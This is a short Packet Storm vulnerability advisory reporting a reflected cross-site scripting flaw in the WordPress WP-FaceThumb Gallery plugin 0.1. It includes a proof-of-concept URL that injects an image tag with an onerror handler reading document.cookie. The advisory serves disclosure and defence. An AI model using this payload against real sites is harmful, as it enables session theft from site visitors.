WordPress WP-FaceThumb Gallery 0.1 Cross Site Scripting

2012-05-13T00:00:00
ID PACKETSTORM:112658
Type packetstorm
Reporter d3v1l
Modified 2012-05-13T00:00:00

Description

                                        
                                            `###########################################################################################################  
  
  
# Wordpress WP-FaceThumb Gallery Plugin <= 0.1 Reflected XSS Vulnerability   
  
# Plugin Page : http://wordpress.org/extend/plugins/wp-facethumb/   
  
# Requires: Wordpress v.3.1 or higher  
  
# Date: 13-05-2012  
  
# Author : Avram Marius Gabriel (d3v1l)  
  
# RandomStorm - http://www.randomstorm.com  
  
# Tested on: Windows XP & 7   
  
  
############################################################################################################  
  
  
# POC:   
  
  
# http://localhost/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)>  
  
  
  
############################################################################################################   
  
# Description:  
  
# This plugin allows your visitor to take a snapshot whith a webcam and the thumb is display on your sidebar.   
# The visitor indicate his pseudo and can let an URL which will be link to the thumb.  
  
############################################################################################################   
`